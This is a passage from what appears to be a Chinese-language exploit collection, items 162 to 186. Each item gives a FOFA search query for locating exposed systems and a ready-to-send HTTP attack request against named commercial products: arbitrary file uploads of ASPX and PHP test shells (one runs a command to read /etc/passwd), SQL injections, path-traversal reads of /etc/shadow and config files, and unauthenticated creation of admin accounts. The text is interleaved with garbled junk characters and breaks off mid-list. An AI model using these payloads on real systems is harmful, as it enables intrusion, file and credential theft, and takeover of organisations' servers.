</soap:Envelope>) L% P" T7 Y+ f
2 w: i0 t- n" b
4 _0 a( [3 E* nhttp://x.x.x.x/dizxdell.aspx' x, c- w, ~! u7 e* d; _7 h
& U8 {! v. l; A' x J% z) T! i
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传$ h# @: b" r1 W/ A+ r+ [
FOFA: app="和丰山海-数字标牌"/ R6 h, x, \: c# L0 J
POST /QH.aspx HTTP/1.1! p- q# o% M3 `
Host: x.x.x.x
/ X: B8 D- M: ~# R7 a; I$ Q, RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ O+ M+ ~+ p+ ~( p$ w: A2 T* F) rConnection: close2 C1 a# m) }6 g5 Y
Content-Length: 583- i, f4 ~! V+ Z0 {3 o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
$ N [. L0 P5 z+ K. `Accept-Encoding: gzip& y5 l+ M5 W, H2 e9 g3 C
2 f8 }$ A0 S4 I7 A% U
------WebKitFormBoundaryeegvclmyurlotuey- z% ^ Q. K# P$ V/ |$ C& I
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"/ U. M+ L: v1 k7 l" ^4 n
Content-Type: application/octet-stream2 q, Z. N( ~* D/ Q& i8 e
( `& K$ B6 [' z* a9 ?<% response.write("ujidwqfuuqjalgkvrpqy") %>$ k6 x, ]* e3 R# L5 G
------WebKitFormBoundaryeegvclmyurlotuey
5 b6 t6 Z/ n1 P$ o$ }, V4 A1 S+ \Content-Disposition: form-data; name="action"
9 J! L; k, n5 h1 D" q" p8 m* D3 P0 I! @
upload- W" ]4 _/ \: ]* o& U$ d& n
------WebKitFormBoundaryeegvclmyurlotuey% e! T' T: [+ B+ T( c8 i
Content-Disposition: form-data; name="responderId"
2 j. ~8 E$ o. D) U
+ u' D* H' @, P. ] f }* V( i( ^ResourceNewResponder+ {- n6 \+ U4 Q9 ?
------WebKitFormBoundaryeegvclmyurlotuey% l; f" x7 o+ m8 \
Content-Disposition: form-data; name="remotePath") O% [8 N8 b, O" }$ W- ^8 c
# p% K: C% R; q
/opt/resources
; q/ ]% u- G! ^------WebKitFormBoundaryeegvclmyurlotuey--7 D* U6 Q* M* J! K
f8 }1 Q" L; g9 m- X7 {. @7 r$ u
' T' R# R9 q4 ?1 f# c3 ihttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
4 Y1 V& v/ D! D6 L8 V. k5 j' i+ H$ a" p
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
5 @) d9 L& `4 Z6 EFOFA: icon_hash="-795291075"
# q3 |+ R3 D* b6 x, n1 \) JPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
0 e( i$ \7 S7 R: S3 [Host: x.x.x.x
$ x- B$ J' S( R2 G- u* x7 `! F' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36/ z+ L+ e9 m" W- l
Connection: close
+ {. p0 n- ^4 SContent-Length: 293
& o1 l1 w6 d' N+ `4 x4 K3 b b6 A, ]Accept: */*- a: h: p- U3 s6 }
Accept-Encoding: gzip, deflate& r8 f# t% f) f% w/ k) i5 B3 g
Accept-Language: zh-CN,zh;q=0.9
3 S+ {9 f. k4 ^. i9 qContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
0 N1 ?0 U; g0 P D1 `
8 N e1 A1 P4 k `------iiqvnofupvhdyrcoqyuujyetjvqgocod. ~' _: X+ f" X5 {+ P2 j
Content-Disposition: form-data; name="name"
% D) |7 c" Z5 F7 y
* D$ t! o" E; P: D4 g. A1.php0 o% H3 h8 n9 b
------iiqvnofupvhdyrcoqyuujyetjvqgocod
. T0 |% Z. C. d, w9 Q: FContent-Disposition: form-data; name="upfile"; filename="1.php"
! I2 L# x" Z; i! ^: w" cContent-Type: image/jpeg, f" k+ A. \/ `0 H( _* Q; S
( m* j6 p9 u4 v
rvjhvbhwwuooyiioxega% L: f% c* t. u3 ]1 V* L) ]
------iiqvnofupvhdyrcoqyuujyetjvqgocod--/ G3 m$ Q$ W0 }/ y$ e% @
1 p) n0 l; t7 s$ k; i9 i. y1 M
7 U3 a; S7 C$ M# I b- r" U164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
2 V: z: m( x+ F) B8 @' s2 TFOFA: title="智慧综合管理平台登入"
+ t) R* A3 r( g6 F! yPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
8 S' b! r/ a. r6 k: }6 y$ PHost: x.x.x.x
2 S) E0 s) O$ n. a" ~: V) C/ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0# D% w( w6 W5 y( i! e
Content-Length: 288/ ^' F$ a, N4 y
Accept: application/json, text/javascript, */*; q=0.011 p0 U" d/ } z/ s- |: z H: z6 U/ Y/ q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' u1 m7 R4 y0 c' O0 J0 AConnection: close
( o0 H/ Y2 R( B& t, uContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* {& b ]' P& ~7 S. |! D. xX-Requested-With: XMLHttpRequest, E7 E* `' b( U! }) |; T
Accept-Encoding: gzip
3 |+ X, L" f0 r _& h4 i6 d5 ?
, o+ h( h6 g; M k1 o% z j------dqdaieopnozbkapjacdbdthlvtlyl
" p# u* \9 M) IContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
" h4 n2 ]# e. M6 yContent-Type: image/jpeg
- Q9 r0 B+ P' d* w) r7 Q3 I1 a h' E) @& v. H% Z; M1 b: \
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>) A; c$ F) b/ N* v/ h N& j
------dqdaieopnozbkapjacdbdthlvtlyl--
3 p* K3 |2 b$ a4 X) O, S ^ _, P
+ l8 v" ~9 a2 U' p9 D6 E( E+ O+ K% f% z6 u5 I
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
6 f* r5 D2 E: M8 u( R
% u5 `# v2 l4 j x! P6 ?1 i165. OrangeHRM 3.3.3 SQL 注入
4 z" h) O! x4 j3 r6 q5 @0 iCVE-2024-364288 G$ n) r3 U$ B& g3 @& R
FOFA: app="OrangeHRM-产品"
, ` U4 F, b4 c W4 sURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
' v# [; h# J! X/ ^; a* [. Q
% }5 s: W, `" Q- v+ T, P1 \& |/ `) n& c# U& v: w7 [' B n7 R- m
166. 中成科信票务管理平台SeatMapHandler SQL注入
. O/ b; ~* t, |7 D$ {9 RFOFA:body="技术支持:北京中成科信科技发展有限公司"
3 t( P6 t, ?6 c& i |& xPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
1 Q' Z* C A8 e" F) S8 cHost:
" A# i5 {1 @; W) k: ]! JPragma: no-cache
+ t2 \6 n* I- c$ g& a- B( rCache-Control: no-cache
+ U3 V& R3 G. e7 ^! zUpgrade-Insecure-Requests: 17 j# I' N' O, `4 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& }; j; Z/ i& S' m' y# H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' W4 R) {' x. t1 E2 n
Accept-Encoding: gzip, deflate
" D4 ^+ l+ v( u/ j4 Y# U7 G) WAccept-Language: zh-CN,zh;q=0.9,en;q=0.86 @. x/ V0 c, N d) |' N. [
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
: U2 t9 n' y& d/ ]) iConnection: close( H. b$ g# V& \( y& M2 a7 b
Content-Type: application/x-www-form-urlencoded
: S1 @0 I' L+ p0 B8 M( H' w vContent-Length: 891 P& a! T s1 k9 y. A6 `
. ] k: Q& A4 t, u& } v0 M
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE. {" G8 ]$ J$ M, [+ `- A
/ R7 `5 n4 I' }& N8 N) E7 K+ }( q5 J6 a
167. 精益价值管理系统 DownLoad.aspx任意文件读取3 h9 M5 _# m P* l* Q! a
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
; `% m! ]. ?3 R( p7 b. n# vGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
/ k6 V+ T( F7 i5 l6 S" m6 m% a% |* wHost:% y2 q) E4 B# K5 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; g$ G! P8 T1 B
Content-Type: application/x-www-form-urlencoded
7 K/ k' b2 f- z' U( mAccept-Encoding: gzip, deflate
/ ^* R: w& k6 ?+ qAccept: */*$ v: [6 Q. l, {9 H- M* y% q
Connection: keep-alive
) o) k) |" `8 F P
1 ^; S& d$ ]6 u6 Y$ ^% S' h2 R) j! b' w9 l- Q( G! O; m
168. 宏景EHR OutputCode 任意文件读取+ k0 D0 b6 i& W; \
FOFA:app="HJSOFT-HCM"2 {. c: r; S7 K4 T3 n/ y z0 z6 `
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
, a* J1 a- K( W; H8 u0 E; h; g5 DHost: your-ip1 M( a3 z w# K* b* }9 l" ?3 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
, c8 J% Z0 b# n9 [Content-Type: application/x-www-form-urlencoded
! W' J _- o, _% V PConnection: close
" e6 P7 v0 T, @* c% A' h" ~/ F- n& w
0 Q5 q" l) [; h" a# S
3 X# ?; O4 d: [2 {' d8 T
169. 宏景EHR downlawbase SQL注入
; @3 z: X5 J; X6 `0 X" z, tFOFA:app="HJSOFT-HCM"
( t- N* C! z+ y( D; b+ kGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' }" Q& T' `# W" F' ?! f: d' U
Host: your-ip
( ^& _' f7 z. K5 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& s: p, w# ? @* W: gAccept: */*. l& ^$ c# E5 W0 z5 s9 a
Accept-Encoding: gzip, deflate9 l) [7 E9 ?2 c
Connection: close
: U/ V! D% [' V+ G+ R9 F4 z* M) R3 ?
7 X' Y9 P& E6 w {- O. ?6 v: f/ H7 D
6 g5 h* v- S3 G8 @5 u! K170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) C# m6 P7 _, Q0 n4 E; ~# eFOFA:body="/general/sys/hjaxmanage.js"% `/ }; A; C; L
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 J# \1 @) |- V
Host: balalanengliang x2 z2 _- F& T( Y
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% Q" D+ W1 \ V* O9 R$ a* W' D- E
Content-Type: application/x-www-form-urlencoded: N$ t) E! o; F+ |1 Z: l ~
% N# u+ r& T( @( F5 B1 t
filename=../webapps/ROOT/WEB-INF/web.xml
3 y- x8 Y! b' F; c+ a' A6 b7 C+ q' t% C* @+ S0 o
# V( T( A8 E1 R. H8 I& A171. 通天星CMSV6车载定位监控平台 SQL注入
/ u( L& U8 Y, x, b0 XFOFA:body="/808gps/"
4 u9 b$ m2 f6 ~) _; S8 p& O7 SGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.19 R6 k5 c6 `9 \+ z+ i
Host: your-ip/ ]8 t8 m" e/ s: o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
: p1 t' c4 C3 C5 g6 P4 z# MAccept: */*
2 N& ?* U1 I1 ~; d. gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Y7 _) w& v/ r( aAccept-Encoding: gzip, deflate+ U8 P$ l0 C% R2 |4 e8 ~; f5 b
Connection: close1 @ e% P" E1 Q+ H2 P
. g J# N9 O; |
! ~+ b/ o5 V+ @ D. w+ v/ ~8 R
! w0 W/ g4 x( T5 R! c- f) ^172. DT-高清车牌识别摄像机任意文件读取$ k. D& G/ v/ w
FOFA:app="DT-高清车牌识别摄像机"6 x+ O; L" P1 U; E5 @# f
GET /../../../../etc/passwd HTTP/1.1
6 u- J. Q6 l0 Z$ _: R& MHost: your-ip: R1 h8 P* @1 o9 E) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( b1 J9 W/ u. F
Accept-Encoding: gzip, deflate
( X# t% Q- R. R1 pAccept: */*
t2 q' u/ m `6 \Connection: keep-alive
( P1 e, h" k5 X/ G0 ~9 d h: k, h# w( B
5 z9 u: S2 R4 m2 B, k; o& J5 R9 v. t3 Q3 o4 D, Y) n
173. Check Point 安全网关任意文件读取+ q! E2 G" r" b' [' l
CVE-2024-24919' g; D4 d% f% o0 E
FOFA:app="Check_Point-SSL-Network-Extender"
: c) q& p4 Q$ D% l y" c1 QPOST /clients/MyCRL HTTP/1.1
; S0 Z. j8 }% y! O, rHost: your-ip. T* K2 \9 L7 c v0 b# u
Content-Type: application/x-www-form-urlencoded) o( v- J5 z; M; p% I' R3 A8 L
& M2 V9 f/ Z2 ]; \
aCSHELL/../../../../../../../etc/shadow' N) H* k+ {8 W5 F( m
1 c1 v9 |4 r8 K. `
( a4 W8 q/ n! ^" s6 v& [6 @- ~: i- @: ]. C. u% T
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
6 Q! a9 b- S3 }FOFA:app="金和网络-金和OA"
c# W) m& t* Y* F, w, M* QGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1, B) D1 K7 E3 ~
Host: your-ip
3 a9 l8 B+ ]# L; N2 u. RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; b ?% \1 z# xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# V6 s/ E. G0 a- P& j) WAccept-Encoding: gzip, deflate, br
1 c7 F5 [; j: q* g3 ?" B/ z2 w; SAccept-Language: zh-CN,zh;q=0.9! q% K! |, S8 e6 l) P. A' Q5 F
Connection: close
( V, ~7 T4 k) Q
! g( V' |' V& p5 U; {! v, F' D5 L: I8 P7 p9 L; L- L. D
9 b( N9 S* {8 h+ f( v175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
, f' ^ \9 [7 y/ w: {0 \7 W2 xFOFA:app="金和网络-金和OA"
* k [& N' w; p& f$ yGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
3 l8 `. j3 [% Y. ~" zHost:9 L& [- g1 ]8 F: x4 e, l
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 i' z7 u, ?' ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ g2 \2 L$ d& B; c7 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. Q. e% f3 b0 Y' w
Accept-Encoding: gzip, deflate
# R' l1 K5 L- K+ F5 D. y$ jConnection: close
! z! H: i0 C# }Upgrade-Insecure-Requests: 1
7 F" ^. ~1 p1 ^9 T9 X
7 ^* X( x/ q( o; [: D1 D* _( s3 O/ x( e; G
176. 电信网关配置管理系统 rewrite.php 文件上传+ W; _! x6 k1 P; t7 j- V
FOFA:body="img/login_bg3.png" && body="系统登录"
6 x' x" r; L0 j$ V, q p' |/ _POST /manager/teletext/material/rewrite.php HTTP/1.1* _4 |6 j& h; M. [5 t4 J
Host: your-ip
% p8 A* b, w8 v7 m5 F. G, _' @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- }$ z; X+ ^' G: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT8 I% _& w7 F+ M2 s7 g H5 a
Connection: close p' B0 j) n' N% F4 z3 F; ^& v3 i7 j. f
8 @+ {7 g' P: ~# U
------WebKitFormBoundaryOKldnDPT
% p7 J- C+ t% p( E' y$ KContent-Disposition: form-data; name="tmp_name"; filename="test.php"" ]4 u" e! d/ A; e2 m6 V
Content-Type: image/png
( `& M- N7 \8 ~' Q; L
* {* i3 P$ }9 z. z$ X% @4 H( Y- ?<?php system("cat /etc/passwd");unlink(__FILE__);?># |. N' e+ w; s! ?) |
------WebKitFormBoundaryOKldnDPT
; d0 S! J; D$ t, }/ ]Content-Disposition: form-data; name="uploadtime"& _/ [. R' i0 q) m, U! l& V8 i+ f0 g
# l s" Y0 z9 }, V9 x3 M & s; c. Q) p7 \$ @$ f1 n. r
------WebKitFormBoundaryOKldnDPT--
0 ]0 K, f2 u' h& v: ?
- x* C7 f+ C8 h6 @0 A+ b. _( [9 a0 u1 G
3 d1 J% O9 p2 N4 b( q177. H3C路由器敏感信息泄露8 h4 p3 X' J; `: y, a$ `+ D7 H
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg3 c8 A {$ c: w- \
/userLogin.asp/../actionpolicy_status/../M60.cfg5 z( U/ r6 {2 d2 b3 M: {& A; U* E
/userLogin.asp/../actionpolicy_status/../GR8300.cfg- Y2 j( o2 Y1 a7 ]! G2 U( r
/userLogin.asp/../actionpolicy_status/../GR5200.cfg$ q2 D* d. L/ m! H- W0 F7 |) x4 o
/userLogin.asp/../actionpolicy_status/../GR3200.cfg' g) q# X0 l. s) |
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
, B% C- q. G) c3 ~; m( H- j/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg6 K9 t2 z4 R, b7 i' Y
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
+ G. P8 ^ ~( _5 [9 q8 U/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
0 t" n+ s, N4 n. V% {/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg! p# _ K, I% T0 a
/userLogin.asp/../actionpolicy_status/../ER5200.cfg0 F+ g0 l" Y0 z( {
/userLogin.asp/../actionpolicy_status/../ER5100.cfg5 K+ z4 w5 ]4 {$ l. y
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg Y+ z- d) J7 F' u! l
/userLogin.asp/../actionpolicy_status/../ER3260.cfg' E+ Q7 h6 ?$ W% y t+ Y8 [
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
1 z7 k7 x, i2 _ _/userLogin.asp/../actionpolicy_status/../ER3200.cfg- s+ X- A; X& y. V4 a8 X
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
5 s, n7 c% Y. Y4 ^* U/userLogin.asp/../actionpolicy_status/../ER3108G.cfg) U7 h' K. M; z# J2 D/ I& Y
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
9 P7 @1 ?% h8 ?3 D) [+ e/userLogin.asp/../actionpolicy_status/../ER3100.cfg( C- K8 U$ R! }8 H$ W
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg' t6 E& I' s& t: A3 T k
- K& V% {2 ?; r) f0 O5 l8 Y p+ C6 A) n* U: }; n/ o, p, X: h
178. H3C校园网自助服务系统-flexfileupload-任意文件上传, v5 ]7 l2 V& o, k" _4 [+ E
FOFA:header="/selfservice") b/ D* C, P( P
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
& @( N% C4 N6 s+ ]Host:& d9 {' G& f$ X0 y+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 J2 @$ x: R6 W$ M7 y; R$ r1 \
Content-Length: 252
8 v* S9 P- Z/ f2 tAccept-Encoding: gzip, deflate
$ d9 q5 ~* F& yConnection: close- |1 |; t1 ]3 X( O Y4 r0 H# }' t
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l% t$ R0 s; C$ J9 m
-----------------aqutkea7vvanpqy3rh2l
3 ?5 z4 |! `. I( oContent-Disposition: form-data; name="12234.txt"; filename="12234"
4 D$ q) M J. c: X3 dContent-Type: application/octet-stream
2 V1 t0 ?% o) RContent-Length: 255
9 S0 ]* V3 H* B M' a5 c
4 o+ w8 Z5 p% V! V5 h2 }12234
" Z1 r7 ~* w9 G2 D& c/ R0 N-----------------aqutkea7vvanpqy3rh2l--
: D6 q4 c2 P* _" O+ v0 J# X5 c
5 Q+ D+ N, a& i; D H
3 u# o3 D8 @$ q, I( a4 ^GET /imc/primepush/%2e%2e/flex/12234.txt
# V! \# A$ s, |( f8 B
/ S, U, d8 Q- c: q: @2 E" A \8 @& ^% t: h* ~
179. 建文工程管理系统存在任意文件读取0 y3 w+ s: I# L) Z1 l5 _+ r
POST /Common/DownLoad2.aspx HTTP/1.1! L2 S, K1 _+ ]( _; k4 ]& v. t9 O
Host: {{Hostname}}
- c- n5 N0 u/ Y5 q' J9 s# B9 `2 nContent-Type: application/x-www-form-urlencoded
" b6 y& }. }0 A1 S% |& ZUser-Agent: Mozilla/5.0
# D G& s# A1 v9 @" k- h5 S+ ^+ G1 ~7 k) Y5 `
path=../log4net.config&Name=# `! k' p2 n, J q' T
2 s. Y. j9 N( E" R, m4 m
5 A- N& w5 {( P& ]1 e180. 帮管客 CRM jiliyu SQL注入
' w" `9 U9 v$ J4 b, v# H* zFOFA:app="帮管客-CRM"& ~9 N' l2 ]. F) {
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ r- O+ ` l4 o4 @* H) y W5 A, Y+ U
Host: your-ip+ R% a5 H- s( y: z, i6 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' c0 F( f6 o( g- J2 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 D, s, i! J; R
Accept-Encoding: gzip, deflate& \0 j! s1 c3 U2 U. l5 R i7 i, @
Accept-Language: zh-CN,zh;q=0.9
7 i' F" Y9 r% A0 Z' e& aConnection: close
; G; W$ Y# c* w( r% |$ s7 E: a+ p0 o% i* F+ Y% L$ w+ t
( F& ^8 ~/ \; \" o4 _3 _0 F. j* w9 S181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入% d3 \& o5 b% U
FOFA:"PDCA/js/_publicCom.js"( q W! d' A0 d: T3 S- x) j. |
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1# G+ E: N* a8 U, l7 X& c+ V) `
Host: your-ip9 E. n6 \5 c8 s8 M% s/ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Y+ D' b8 S/ L5 r- Z* U0 f$ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( `; T: x' v4 h: p2 H& W% y! A' A
Accept-Encoding: gzip, deflate, br
5 B x# X2 F5 `" @* RAccept-Language: zh-CN,zh;q=0.9& K5 j" P3 @! w% ]& U$ ]
Connection: close$ B) {6 T8 P: Q: p8 `2 I
Content-Type: application/x-www-form-urlencoded
& q% ]) S4 b4 [3 m h8 ?# A, r+ N1 Y# T, S9 |& D7 B
9 Z0 f, A) ]: yaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
; C7 y/ `5 {2 j, ^ Y
, A( w/ p- X+ ~8 n3 R0 [
, l* s" b( U* [+ o( r182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% Y4 O* w) Z3 P( G. |
FOFA:"PDCA/js/_publicCom.js"
0 L& @+ J) @& F2 O! V: ^POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1" b2 Y9 q# B' {. U; L. ]
Host: your-ip X, k# ]4 m4 |! ~3 [% Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 b- e8 y' w& h* a. r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: [6 @$ T% b2 Q5 {6 O
Accept-Encoding: gzip, deflate, br$ z- `5 ~" `, d# a
Accept-Language: zh-CN,zh;q=0.94 ?, A% s. \+ N2 o
Connection: close
d2 ?4 d) a. Z- HContent-Type: application/x-www-form-urlencoded. T; w" f% `( Y. ~ U9 _9 E) y5 F
3 u6 e% D0 g4 N; Y z2 n( D6 t- X& j' x; h# m9 [# _
username=test1234&pwd=test1234&savedays=11 J- c7 f+ V& @
% f3 k1 u0 X* V1 b3 j+ I& |- h- v( y: A& L: a
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 z$ l) o. p) c+ ^0 QFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"1 G1 u0 P$ n) O6 Q3 ^' K- ^' O
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1: K1 z9 V9 l/ c8 ~* p# \6 f
Host: your-ip, n+ H# ]1 v% }2 i7 M
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 O/ ~! X) P. r# B. g$ e
Accept-Charset: utf-8 B2 Y @6 g* Z+ u8 f9 ]
Accept-Encoding: gzip, deflate
, z% B) t0 I0 j4 Y$ l/ M1 ~Connection: close! r9 K4 e0 b% X* a& z" `
" ]) p/ m$ i5 c8 e1 e0 R1 z1 |+ K5 J2 A6 Z- c. U
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 H5 ^/ s4 o4 OFOFA:server="SunFull-Webs"
8 E, E, \( b* z. w! `POST /soap/AddUser HTTP/1.1
\. {: D& r% n/ v+ THost: your-ip
# m$ F+ j# S: FAccept-Encoding: gzip, deflate8 f% i! i" M& Z5 L, z$ x: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
/ L# C* S- L1 C& d& a' a8 ]Accept: application/xml, text/xml, */*; q=0.01
$ i( R& g. v0 l( J* [" YContent-Type: text/xml; charset=utf-8( M: c2 i# P2 ~3 V4 l% p; e1 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 ?, K" ~5 _% Y, _ o! O/ \
X-Requested-With: XMLHttpRequest
Q% @+ }6 T. g% ^3 s- L2 p
$ ~. Z% @$ @6 V/ _
8 D! ?; Y" k: |$ z4 j# f) cinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')! j+ Z7 [) [4 i3 Z' m/ S( a
% B6 R5 i$ \0 S; Z5 q
) J) {+ S9 S: r, }% o' y5 {3 c& f185. 瑞友天翼应用虚拟化系统SQL注入
5 e5 ~9 G" J8 e- V( bversion < 7.0.5.1
& w! x' x( R2 |) j! IFOFA:app="REALOR-天翼应用虚拟化系统"" b- C( N1 j* o( `, U7 e+ @' u/ o x
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
; l" F4 \& h4 ]: C# }Host: host
! M4 D( s2 T) K# e
j r4 h; b3 h0 r" E6 I C/ |$ ^& w
; g7 _" Y: b+ q4 N" |186. F-logic DataCube3 SQL注入
